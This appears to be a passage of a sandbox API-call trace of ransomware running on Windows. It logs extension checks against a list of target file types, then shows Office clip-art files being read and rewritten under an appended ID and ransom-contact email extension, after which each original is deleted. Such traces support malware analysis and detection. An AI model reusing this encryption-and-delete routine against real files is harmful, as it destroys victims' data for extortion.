lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.991] lstrlenW (lpString=".dbf") returned 4 [0062.991] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.991] lstrlenW (lpString=".1cd") returned 4 [0062.991] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.992] lstrlenW (lpString=".jpg") returned 4 [0062.992] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.992] lstrlenW (lpString=".doc") returned 4 [0062.992] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.992] lstrlenW (lpString=".docx") returned 5 [0062.992] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.992] lstrlenW (lpString=".pdf") returned 4 [0062.992] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.992] lstrlenW (lpString=".xls") returned 4 [0062.992] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.992] lstrlenW (lpString=".xlsx") returned 5 [0062.992] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.992] lstrlenW (lpString=".ppt") returned 4 [0062.992] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.992] lstrlenW (lpString=".zip") returned 4 [0062.992] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.992] lstrlenW (lpString=".rar") returned 4 [0062.992] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.992] lstrlenW (lpString=".bz2") returned 4 [0062.992] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.992] lstrlenW (lpString=".7z") returned 3 [0062.992] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.992] lstrlenW (lpString=".dbf") returned 4 [0062.992] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.992] lstrlenW (lpString=".1cd") returned 4 [0062.992] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.992] lstrlenW (lpString=".jpg") returned 4 [0062.992] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.993] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.993] lstrlenW (lpString="BD08758_.WMF") returned 12 [0062.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.993] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=24320) returned 1 [0062.993] CloseHandle (hObject=0x368) returned 1 [0062.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf")) returned 0x220 [0062.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.995] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.995] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.995] GetLastError () returned 0x0 [0062.995] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x5f00, lpOverlapped=0x0) returned 1 [0063.045] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x5f10, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x5f10, lpOverlapped=0x0) returned 1 [0063.046] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.046] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.047] SetEndOfFile (hFile=0x344) returned 1 [0063.047] CloseHandle (hObject=0x344) returned 1 [0063.048] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.048] SetEndOfFile (hFile=0x368) returned 1 [0063.048] CloseHandle (hObject=0x368) returned 1 [0063.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.049] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf")) returned 1 [0063.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.049] lstrlenW (lpString=".doc") returned 4 [0063.049] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.049] lstrlenW (lpString=".docx") returned 5 [0063.049] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.049] lstrlenW (lpString=".pdf") returned 4 [0063.049] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.049] lstrlenW (lpString=".xls") returned 4 [0063.049] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.049] lstrlenW (lpString=".xlsx") returned 5 [0063.049] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.049] lstrlenW (lpString=".ppt") returned 4 [0063.049] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.049] lstrlenW (lpString=".zip") returned 4 [0063.049] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.049] lstrlenW (lpString=".rar") returned 4 [0063.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.049] lstrlenW (lpString=".bz2") returned 4 [0063.050] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.050] lstrlenW (lpString=".7z") returned 3 [0063.050] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.050] lstrlenW (lpString=".dbf") returned 4 [0063.050] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.050] lstrlenW (lpString=".1cd") returned 4 [0063.050] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.050] lstrlenW (lpString=".jpg") returned 4 [0063.050] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.050] lstrlenW (lpString=".doc") returned 4 [0063.050] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.050] lstrlenW (lpString=".docx") returned 5 [0063.050] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.050] lstrlenW (lpString=".pdf") returned 4 [0063.050] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.050] lstrlenW (lpString=".xls") returned 4 [0063.050] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.050] lstrlenW (lpString=".xlsx") returned 5 [0063.050] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.050] lstrlenW (lpString=".ppt") returned 4 [0063.050] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.050] lstrlenW (lpString=".zip") returned 4 [0063.050] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.050] lstrlenW (lpString=".rar") returned 4 [0063.050] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.050] lstrlenW (lpString=".bz2") returned 4 [0063.050] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.050] lstrlenW (lpString=".7z") returned 3 [0063.050] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.051] lstrlenW (lpString=".dbf") returned 4 [0063.051] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.051] lstrlenW (lpString=".1cd") returned 4 [0063.051] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0063.051] lstrlenW (lpString=".jpg") returned 4 [0063.051] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.051] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0063.051] lstrlenW (lpString="BD08868_.WMF") returned 12 [0063.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0063.051] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=40206) returned 1 [0063.051] CloseHandle (hObject=0x368) returned 1 [0063.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf")) returned 0x220 [0063.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0063.052] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.052] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.052] GetLastError () returned 0x0 [0063.052] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x9d0e, lpOverlapped=0x0) returned 1 [0063.062] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x9d10, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x9d10, lpOverlapped=0x0) returned 1 [0063.063] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.064] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.064] SetEndOfFile (hFile=0x344) returned 1 [0063.064] CloseHandle (hObject=0x344) returned 1 [0063.065] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.065] SetEndOfFile (hFile=0x368) returned 1 [0063.066] CloseHandle (hObject=0x368) returned 1 [0063.066] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.066] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf")) returned 1 [0063.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.067] lstrlenW (lpString=".doc") returned 4 [0063.067] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.067] lstrlenW (lpString=".docx") returned 5 [0063.067] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.067] lstrlenW (lpString=".pdf") returned 4 [0063.067] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.067] lstrlenW (lpString=".xls") returned 4 [0063.067] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.473] lstrlenW (lpString=".xlsx") returned 5 [0063.473] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.473] lstrlenW (lpString=".ppt") returned 4 [0063.473] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.473] lstrlenW (lpString=".zip") returned 4 [0063.473] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.473] lstrlenW (lpString=".rar") returned 4 [0063.473] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.473] lstrlenW (lpString=".bz2") returned 4 [0063.473] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.473] lstrlenW (lpString=".7z") returned 3 [0063.473] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.474] lstrlenW (lpString=".dbf") returned 4 [0063.474] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.474] lstrlenW (lpString=".1cd") returned 4 [0063.474] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.474] lstrlenW (lpString=".jpg") returned 4 [0063.474] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.474] lstrlenW (lpString=".doc") returned 4 [0063.474] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.474] lstrlenW (lpString=".docx") returned 5 [0063.474] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.474] lstrlenW (lpString=".pdf") returned 4 [0063.474] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.474] lstrlenW (lpString=".xls") returned 4 [0063.474] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.474] lstrlenW (lpString=".xlsx") returned 5 [0063.474] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.474] lstrlenW (lpString=".ppt") returned 4 [0063.474] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.474] lstrlenW (lpString=".zip") returned 4 [0063.474] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.474] lstrlenW (lpString=".rar") returned 4 [0063.474] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.474] lstrlenW (lpString=".bz2") returned 4 [0063.474] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.474] lstrlenW (lpString=".7z") returned 3 [0063.475] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.475] lstrlenW (lpString=".dbf") returned 4 [0063.475] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.475] lstrlenW (lpString=".1cd") returned 4 [0063.475] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0063.475] lstrlenW (lpString=".jpg") returned 4 [0063.475] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.475] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0063.475] lstrlenW (lpString="BD20013_.WMF") returned 12 [0063.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0063.476] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=11058) returned 1 [0063.476] CloseHandle (hObject=0x2c8) returned 1 [0063.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf")) returned 0x220 [0063.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0063.476] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.476] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.477] GetLastError () returned 0x0 [0063.477] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2b32, lpOverlapped=0x0) returned 1 [0063.537] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2b40, lpOverlapped=0x0) returned 1 [0063.538] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.538] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.538] SetEndOfFile (hFile=0x354) returned 1 [0063.538] CloseHandle (hObject=0x354) returned 1 [0063.539] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.539] SetEndOfFile (hFile=0x2c8) returned 1 [0063.540] CloseHandle (hObject=0x2c8) returned 1 [0063.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.541] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf")) returned 1 [0063.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0063.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0063.541] lstrlenW (lpString=".doc") returned 4 [0063.541] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.541] lstrlenW (lpString=".docx") returned 5 [0063.541] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.541] lstrlenW (lpString=".pdf") returned 4 [0063.541] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.541] lstrlenW (lpString=".xls") returned 4 [0063.541] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.542] lstrlenW (lpString=".xlsx") returned 5 [0063.542] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.542] lstrlenW (lpString=".ppt") returned 4 [0063.542] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0063.542] lstrlenW (lpString=".zip") returned 4 [0063.542] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.542] lstrlenW (lpString=".rar") returned 4 [0063.542] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.542] lstrlenW (lpString=".bz2") returned 4 [0063.542] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.542] lstrlenW (lpString=".7z") returned 3 [0063.542] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0063.542] lstrlenW (lpString=".dbf") returned 4 [0063.542] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0063.542] lstrlenW (lpString=".1cd") returned 4 [0063.542] 